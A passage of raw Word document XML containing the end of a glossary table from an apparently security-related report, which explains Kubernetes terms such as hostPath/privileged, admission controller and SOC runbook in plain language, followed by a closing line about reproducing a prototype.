              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hostPath / privileged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mounting the machine's own disk into a job / giving it master keys — together = escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Admission controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bouncer that can refuse dangerous job requests before they run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOC / runbook / LIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Watch team / their handbook / the lab order book (ground truth for deliveries)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>— End of report. Questions? Start with docs/02 in plain language, then replay the prototype. If any step doesn't reproduce, the report is wrong and the code is right — tell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